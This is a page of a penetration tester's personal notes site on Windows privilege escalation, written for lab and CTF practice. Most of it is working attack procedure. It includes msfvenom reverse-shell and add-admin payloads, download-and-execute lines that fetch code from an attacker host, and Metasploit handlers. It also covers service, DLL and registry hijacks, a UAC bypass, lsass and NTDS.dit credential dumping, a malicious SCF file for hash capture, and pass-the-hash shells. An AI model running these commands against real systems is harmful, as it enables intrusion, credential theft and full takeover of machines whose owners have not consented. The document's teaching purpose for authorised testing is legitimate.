CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Enumeration
  • Kernel Exploits
  • What is a kernel
  • Kernel Exploits
  • Famous kernel exploit
  • Enumeration and Exploitation Examples
  • Tools
  • Unquoted Service Path Vulnerabilities
  • What is it
  • Preresquisites
  • Methodology
  • Enumeration with powerUp
  • Exploitation
  • Runas
  • What is it
  • Enumerate
  • How to exploit
  • Autorun
  • What is it
  • Enumerate
  • How to exploit
  • Service Escalation - Registry
  • What is it
  • Enumeration
  • How to exploit
  • Escalation via Executable Files
  • What is it
  • Enumeration
  • How to exploit
  • Startup Applications
  • What is it
  • Enumeration
  • How to exploit
  • DLL Hijacking
  • What is it
  • Enumeration
  • How to exploit
  • Binary path
  • Enumeration
  • Exploitation
  • Escalation via User Privileges
  • SeDebugPrivilege
  • SeTakeOwnershipPrivilege
  • Privesc via Group Privileges
  • Backup Operators
  • Event log readers
  • DnsAdmins
  • Hyper-V Administrators
  • Print Operators
  • Server Operators
  • Privesc via OS attacks
  • UAC Bypass
  • Weak permissions
  • Privesc with found credentials
  • Browser Credentials
  • Other ways to privesc
  • Interact with users
  • Privesc on Legacy OS
  • Windows Server 2008
  • Windows Desktop 7
  • Checklists
  • Resources
  1. Windows

Privilege Escalation

PreviousEnumeration and general Win tipsNextActive Directory

Last updated 2 years ago

Enumeration

  • You can do some manual enumeration using

  • You can also do automatic enumeration using dedicated

Kernel Exploits

What is a kernel

Kernel

Windows kernel

Kernel Exploits

Methodology

  1. Enumerate win version / patch level (systeminfo)

  2. Find matching exploits (Google, ExploitDB, GIthub)

  3. Compile and run

ATTENTION: Kernel exploits are often unstable and could crash the system

Famous kernel exploit

  • MS08-067 - vulnerability in the "Server" service

  • MS17-010 - EternalBlue - remote code execution vulnerability

  • CVE-2021-36934 HiveNightmare - SeriousSam - Windows 10 flaw that results in ANY user having rights to read the Windows registry

Enumeration and Exploitation Examples

  • icacls c:\Windows\System32\config\SAM check perm on SAM file

  • Check for spooler service using powershell ls \\localhost\pipe\spoolss

    • Set-ExecutionPolicy Bypass -Scope Process

    • Import-Module .\CVE-2021-1675.ps1

    • Invoke-Nightmare -NewUser "username" -NewPassword "password123!" -DriverName "PrintIt"

    • Check if it worked net user username

  • Check installed updates

    • Powershell systeminfo wmic qfe list brief Get-Hotfix

    • CMD with wmic wmic qfe list brief

  • CVE-2020-0668

      • Download it

      • Open it with visual studio

      • Build it

    • Check for a third party serv that can be leverage. Check perm on a binary icacls "c:\path\to\leverage-bin.exe"

    • Generate a malicious file msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ATTACK-IP LPORT=PORT -f exe > leverage-bin.exe

    • python3 -m http.server 80 serve the binary

    • Download 2 copy of the binary

      • wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin.exe

      • wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin2.exe

    • Run the exploit C:\CVE-2020-0668\CVE-2020-0668.exe C:\Users\user\Desktop\leverage-bin.exe "c:\path\to\leverage-bin.exe"

    • Check perm of new file icacls 'c:\path\to\leverage-bin.exe'

    • Replace with malicious binary copy /Y C:\Users\user\Desktop\leverage-bin2.exe "c:\path\to\leverage-bin.exe"

    • Use a Metasploit Resource Script

      • Make a file named handler.rc and put this in it

        use exploit/multi/handler
        set PAYLOAD windows/x64/meterpreter/reverse_https
        set LHOST <our_ip>
        set LPORT 8443
        exploit
      • Launch metasploit this the resource script msfconsole -r handler.rc

    • Start the service net start leverage-serv

    • Even if we get an error we should have a reverse shell in meterpreter

Tools

Executables

PowerShell

Sherlock

  • We can launch it with cmd like this (has to be served through an http server from the attacking machine) echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/Sherlock.ps1') | powershell -noprofile -

  • Launch from Powershell

Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\Sherlock.ps1
Find-AllVulns

PowerUp

Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\PowerUp.ps1
Invoke-AllChecks

JAWS

Other

Exploit Suggesters

  • Here is a convenient command in wes to grep specifically for privesc exploit and have an output in color python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"

Precompiled kernel exploits

SessionGopher

LaZagne

Sysinternals Suite

Pre-compiled binaries.

It can be useful to have precompiled binaries just ready to run

Unquoted Service Path Vulnerabilities

What is it

Abuse of the research methodology of executable of windows. We will try to place an excutable in a location windows will be looking.

Preresquisites

  • We will need write permissions in an executable folder

  • Check if the binary path is unquoted, we can check a service using sc qc name-of-service

  • Use msfvenom to generate an executable file msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK-MACHINE-IP LPORT=7777 -f exe > executable_name.exe

  • Restart the service sc start service-name

Methodology

  • Enumerate with automatic tools or this command: wmic service get name,displayname,pathname,startmode (it will list the running services)

  • Check if we can write in the folder of the service

Enumeration with powerUp

  • powershell -ep bypass

  • . .\PowerUp.ps1

Exploitation

  • msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

  • We place the executable in the folder of the program we wish to abuse

  • We start the vulnerable service in our example unquotedsvc sc start unquotedsvc

  • we should be added as an administrator we can verify this using net localgroup administrators

Runas

What is it

  • It is the possibility of running a command as another user

Enumerate

  • cmdkey /list

How to exploit

Autorun

What is it

  • It is when you abuse the fact that a program runs automatically

Enumerate

OR

    • In a win cmd type powershell -ep bypass

    • Then . .\PowerUp.ps1 to load powerUp

How to exploit

  • In kali

    • msfconsole

    • use multi/handler

    • set payload windows/meterpreter/reverse_tcp

    • set lhost Your-Kali-IP-Address

    • run

    • In another cmd tab msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe (give it the same name as the program that has autorun)

  • Take the program you created with msfvenom in your target (python HTTP server and then the browser in your target)

  • In your target

    • Place the program in the directory where the autorun program is

    • Wait for the administrator to log in

  • You should have a shell in your kali in Metasploit

Service Escalation - Registry

What is it

  • If we have admin rights of a registry key in service we could use this to make an executable run with a service (add a user, get a shell, ...)

Enumeration

How to exploit

  • We will modify the whoami command: system("whoami > c:\\windows\\temp\\service.txt"); we will add this instead cmd.exe /k net localgroup administrators user /add so our script now looks like this: system("cmd.exe /k net localgroup administrators user /add");

  • We will compile it x86_64-w64-mingw32-gcc windows_service.c -o x.exe

  • Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)

  • In a cmd from our target reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

  • Now we just need to start the service sc start regsvc

  • net localgroup administrators we can see that our user is now in the administrators group

Escalation via Executable Files

What is it

  • Abusing an executable that we have permissions on

Enumeration

  • powershell -ep bypass

  • . .\PowerUp.ps1

OR

How to exploit

  • We will modify the whoami command: system("whoami > c:\\windows\\temp\\service.txt"); we will add this instead cmd.exe /k net localgroup administrators user /add so our script now looks like this: system("cmd.exe /k net localgroup administrators user /add");

  • We will compile it x86_64-w64-mingw32-gcc windows_service.c -o x.exe

  • Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)

  • In the target cmd copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

  • sc start filepermsvc

  • Our user should be in the local administrators group

Startup Applications

What is it

  • We will abuse a program that is launched on startup in which we have rights

Enumeration

  • The BUILTIN/Users group has full acces (F) to the Startup directory

How to exploit

  • In our attack machine msfconsole we launch Metasploit

  • use multi/handler

  • set payload windows/meterpreter/reverse_tcp

  • set lhost IP-OF-OUR-ATTACK-MACHINE

  • run

  • In another tab msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP-OF-OUR-ATTACK-MACHINE -f exe -o x.exe

  • We serve the executable in our target (python http server -> and browse to it from our target)

  • We put the file in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" (If you are in the explorer you may have to type ProgramData in the path if it does not appear).

  • We wait for an admin to log in

DLL Hijacking

What is it

  • DLL is a dynamic Library they often run with executables, when an executable runs the system will look for the dll and if the dll does not exist we could replace it with one of our own.

Enumeration

    • This will list the dll not found

    • We will need write access to the folder where the dll are missing

How to exploit

  • Edit the file and modify the system command to add our user to the admin goup which would look like this: system("cmd.exe /k net localgroup administrators user /add");

  • We can now compile it x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

  • We serve it to our target (python http server -> browser of our target)

  • We put it in the path where the system will look for it, in our example it is the temp folder

  • We restart the service sc stop dllsvc & sc start dllsvc

  • Our user should be in the admin group now

Binary path

Enumeration

  • PowerUP we should see the service exploitable under the [*] Checking service permissions

OR

Exploitation

  • sc config daclsvc binpath= "net localgroup administrators user /add"

  • sc start daclsvc

  • We should be added to the administrators group net localgroup administrators

Escalation via User Privileges

SeDebugPrivilege

Enumeration

  • whoami /priv the SeDebugPrivilege should be listed

Exploitation

  • procdump.exe -accepteula -ma lsass.exe lsass.dmp We will use ProcDump from the SysInternals suite to leverage this privilege and dump the lsass process memory.

  • We can launch mimikatz from our target

    • mimikatz.exe

    • log

    • sekurlsa::minidump lsass.dmp

    • sekurlsa::logonpasswords

    • And now we can take the hashes we need

  • If mimikatz does not work and if we have RDP we can dump lsass from the taskmanager (tab "Details" right click on the lsass process and select "Create dump file"

  • We can then take the dump to our attack machine et use pypykatz

    • pypykatz lsa minidump lsass.DMP

SeTakeOwnershipPrivilege

  • With this privilege, a user could take ownership of any file or object and make changes that could involve access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DOS). In this case we need a file to target.

Enumeration

Exploitation

    • Import-Module .\Enable-Privilege.ps1

  • Check the change of ownership worked PS C:\htb> Get-ChildItem -Path 'C:\Path\To\File' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

  • Use the file you have ownership now! :D

Privesc via Group Privileges

Backup Operators

SeBackupPrivilege

  • This allows us to copy a file from a folder

    • We need to import the libs Import-Module .\SeBackupPrivilegeUtils.dll and Import-Module .\SeBackupPrivilegeCmdLets.dll

  • We can now copy protected files and then use them Copy-FileSeBackupPrivilege 'c:\path\to\file\file.txt' .\file.txt

Copying NTDS.dit (for DC)

  • This group will also let us logging in locally to a domain controller.

  • NTDS is the active directory database it contains the ntlm hashes of all users and computers in the domain

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
  • Then we just need to copy it with the SeBackupPrivilege Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\paht\to\destination\ntds.dit

Backing up SAM and SYSTEM

  • reg save HKLM\SYSTEM SYSTEM.SAV

  • reg save HKLM\SAM SAM.SAV

Extract the creds

  • We can use secretdumps secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL or the ps module DSInternals

PS C:\user> Import-Module .\DSInternals.psd1
PS C:\user> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\user> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=domain,DC=local' -DBPath .\ntds.dit -BootKey $key

Event log readers

  • net localgroup "Event Log Readers"

  • wevtutil qe Security /rd:true /f:text | Select-String "/user" search Security logs (credentials could be dropped this way)

  • Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} Another way to do the same thing

  • It is also worth to check PowerShell Operational logs

DnsAdmins

  • Get-ADGroupMember -Identity DnsAdmins to confirm group membership

  • msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll we generate a dll with msfvenom that will add a user or we can make one that will get us a shell as admin msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o shell.dl

  • Do not forget to launch a listener if you use the reverse shell rlwrap nc -lnvp 4444

  • Serve the dll using python web server python3 -m http.server 80

  • Download the file in the target wget "http://Attacking-machine-IP/adduser.dll" -outfile "adduser.dll" (in powershell)

  • sc stop dns

  • sc start dns

  • net group "Domain Admins" /dom check that we have the priv (or catch the shell)

Hyper-V Administrators

  • CVE-2018-0952

  • CVE-2019-0841

  • Has been mitigated since March 2020

Print Operators

#include <stdio.h>
#include "tchar.h"
  • We can then compile it using cl.exe from a visual studio cmd cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

  • We can then add the reference to the drive reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

    • .\DriverView.exe /stext drivers.txt

    • cat drivers.txt | Select-String -pattern Capcom

Server Operators

  • With this group you will get theSeBackupPrivilege and SeRestorePrivilege

  • sc qc AppReadiness

    • c:\PsService.exe security AppReadiness

  • Modify service binary path sc config AppReadiness binPath= "cmd /c net localgroup Administrators current-user /add"

  • sc start AppReadiness Start the service (will fail)

  • We should be in the Admin group net localgroup Administrators

  • We can now retrieve creds with crackmapexec crackmapexec smb IP-ADDRESS -u current-user -p 'current password'

  • Dump hash and pass secretsdump.py current-user@IP-ADDRESS -just-dc-user administrator

  • We can then get an admin shell using the found hashes psexec.py INLANEFREIGHT/administrator@IP-ADDRESS -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54

Privesc via OS attacks

UAC Bypass

  • REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA confirm UAS is enabled

  • REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin Checking UAC Level

  • If ConsentPromptBehaviorAdmin is 0x5 it means the highest UAC level of Always notify is enabled

  • msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS-OF_ATTACK_MACHINE LPORT=PORT -f dll > srrstr.dll generate a malicious dll

  • python3 -m http.server 80 serve it to the target

  • curl http://IP-ATTACK-MACHINE/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll" get it on the target

  • nc -lvnp CHOSEN-PORT launch listener

  • rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll run the dll to get the reverse shell back and check if uac is enabled for our current user

  • C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe execute this to get an elevated shell

Weak permissions

Permissive ACLs

  • .\SharpUp.exe audit to enumerate

  • Make a back up of the original binary and replace it with a malicious one generated by msfvenom msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=8888 -f exe > file.exe (instead of shell name it with the name of the executable that you are abusing

  • Set up a listener nc -lnvp 8888

  • cmd /c copy /Y file.exe "C:\Path\to\file.exe" copy the exec instead of the original one

  • sc start file start the service

  • Get your shell

  • If you want to exploit it by adding a user msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > file.exe

Weak Service permissions

  • .\SharpUp.exe audit to enumerate

  • sc config service binpath="cmd /c net localgroup administrators user /add" change the service binary path

  • sc stop service stop the service

  • sc start service start the service (it will fail but our exploit will work)

  • net localgroup administrators check that you user is now admin

  • To clean up

    • sc config WindScribeService binpath="C:\Path\to\service.exe" revert binary path

    • sc start service start the service

    • sc query service check that service is running

Privesc with found credentials

Browser Credentials

Other ways to privesc

Interact with users

  • Capture traffic if wireshark is installed

  • Process monitoring

    while($true)
    {
    
      $process = Get-WmiObject Win32_Process | Select-Object CommandLine
      Start-Sleep 1
      $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
      Compare-Object -ReferenceObject $process -DifferenceObject $process2
    
    }
    • IEX (iwr 'http//IP-OF-ATTACK-MACHINE/procmon.ps1') execute the script from our target with the code hosted in our attacking machine

  • Vulnerable service abuse

  • Shell Command File on File Share to capture ntlmv2 pass hash.

    • We need an interesting share writable by our user accesschk -s -w C:\folder-of-shares

    • Create a malicious SCF file and name it with an @ at the start for example @Inventory.scf

    [Shell]
    Command=2
    IconFile=\\ATTACK-IP\share\legit.ico
    [Taskbar]
    Command=ToggleDesktop
    • We then just need to start Responder

      • sudo responder -wrf -v -I INTERFACE-USED (your interface can be tun0 for instance it has to be one reachable by the target)

    • Finally we can crack the found hash with hashcat hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

Privesc on Legacy OS

Windows Server 2008

  • wmic qfe will show missing KBs

    • On powershell Set-ExecutionPolicy bypass -Scope process

    • Import-Module .\Sherlock.ps1

    • Find-AllVulns

  • Get a meterpreter shell

    • msfconsole

    • search smb_delivery you should see this one 0 exploit/windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery

    • use 0

    • show options set srvhost and lhost to your attack machine

    • set the target to DLL (show targets set target 0

    • exploit

    • Paste the comand shown on msf in the target

    • Receive the shell

  • Find a local privesc exploit

  • For example we can use CVE 2010-3338

  • on metasploit search 2010-3338 you should see 0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation

  • Migrate the process

  • Backgound the session background

  • set session 1

  • set lhost to your attacking machine IP

  • set lport to a free prot

  • exploit

  • You should get an elevated shell

Windows Desktop 7

    • python2.7 windows-exploit-suggester.py --update this will dl a database file in xls format that you can use

    • python2.7 windows-exploit-suggester.py --database 2022-04-30-mssb.xls --systeminfo systeminfo

    • In Powershell Set-ExecutionPolicy bypass -scope process

    • Import-Module .\exploit.ps1

    • Invoke-MS16-032

    • We will get an elevated shell

Checklists

Resources

Windows kernel

See an example of a privesc with a kernel exploit in

Exploit CVE-2021-36934 with this you will get hash and then will be able to get a shell for instance with psexec psexec.py INLANEFREIGHT/administrator@10.129.43.13 -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54

Add local admon with PrintNightmare with this

Check out this blog

Use this

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.

is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

C# project for performing a wide variety of local privilege escalation checks

C# version of PowerUp

is a powershell script that will give exploit related to the target. It can also be found here on kali if empire is installed /usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1

is a powershell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found.

is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

is a python script that will provide the list of vulnerabilities the OS is vulnerable to using systeminfo is a blog post about wes next generation

is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information.

is a tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more

is a suite of tools that is used to monitor, manage and troubleshoot the Windows operating system owned by Microsoft. It is really useful for enumeration.

Check if we have writing rights with our user we can use .\accesschk64.exe /accepteula -uwdq "C:\Program Files\" we will have a list of user groups with read and write privs

Invoke-AllChecks

Check the writeup for Access on HTB to have an example of privesc using runas

Check what programs have autorun using see example below

Check that the program you found that allows FILE_ALL_ACCESS to Everyone using in our example we would type this in the cmd C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

With :

Invoke-AllChecks

In a powershell prompt type Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

We will use this

Invoke-AllChecks

If we know what program it is we can just do C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service" where File Permissions Service is the program we want to abuse

We will use this

We can enumerate using icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

We should have a shell in metasploit

We can find it using procmon, we need to add 2 filters "Result is NAME NOT FOUND" and "PATH ends with .dll"

We are going to use

We can use accesschk64.exe -wuvc Everyone *

Will list service we can write and to which everyone has access (in our example the service is daclsvc)

whoami /priv SeTakeOwnershipPrivilege should be listed

If necessary enable the privilege using

.\EnableAllTokenPrivs.ps1

Take ownership of a flag using `

Modify the file ACL with icacls 'C:\Path\To\File' /grant user:F

is a poc to abuse this

whoami /priv to check if we have the SeBackupPrivilege

It is disabled so we can enable it with Set-SeBackupPrivilege

We can use to make a copy of the drive diskshadow.exe

Note: We can also use to copy the files

Using this group privileges, it is possible to use to specify the path of a DLL plugin.

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll load custom dll (in CMD)

We need to check for the SeLoadDriverPrivilege in a cmd shell launched as admin whoami /priv

We download this to enable the privilege. We need to add the few lines at the begining of the script

We then have to download the driver file

In powershell we check that the Capcom driver is not loaded with

Now we need to check it has been enabled

Finally we can launch the exploit using it will launch a shell as authority system

We can check permissions with sysinternals

Checkout the Pentips on uac bypass

[environment]::OSVersion.Version check win OS version compare with version history

List of UAC bypass

Pentips on abusing ACLs

If you detect an executable that you could abuse you can check the permissions with icacls "C:\Path\to\file.exe"

Check permissions on the file you might be able to abuse using win internals accesschk.exe /accepteula -quvcw service

You can read more about hunting credentials and

We can use to retrive cookies and saved logins from Google Chrome

We can use to dump passwords from the system .\lazagne.exe all

We can use to find the vulnerabilities the target might have.

Gather systeminfo and use

Example of MS16-032 with this

See the definition on Wikipedia
Windows kernel in detail here
Windows Kernel Exploits
this writeup
poc
Powershell PoC
post
exploit
WinPEAS
Watson
Seatbelt
SharpUp
JAWS
Sherlock.ps1
PowerUp
JAWS
Windows Exploit Suggester
Here
Metasploit Local Exploit Suggester
Precompiled kernel exploits
SessionGopher
LaZagne
Sysinternals Suite
Security Update Guide
GhostPack-Compiled Binaries - harmj0y
LaZagne releases
accesschk
here
PowerUp
C script
C script
windows_dll.c
accesschk
this script
takeown
icalcs
Here
diskshadow
robocopy
dnscmd
Hyper V admin EOP - decoder it
tool
Capcom.sys
DriverView.exe
ExploitCapcom.exe
PsService
here
here
here
here
icacls
AccessChk
SharpChrome
lazagne
Sherlock
windows exploit suggester
poc
Hacktricks
PayloadAllTheThings
Windows internals - autorun
Windows internals - accesschk
Windows internals - icacls
tools (see the tools below)
From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS AdministrationActive Directory Security
From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS Administration
here
here
Windows Privilege Escalation for Beginners
TCM Security Academy - Windows Privilege Escalation
TryHackMe | Windows PrivEsc ArenaTryHackMe
Windows privesc arena by TCM on TryHackMe
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows privesc on Fuzzy Security
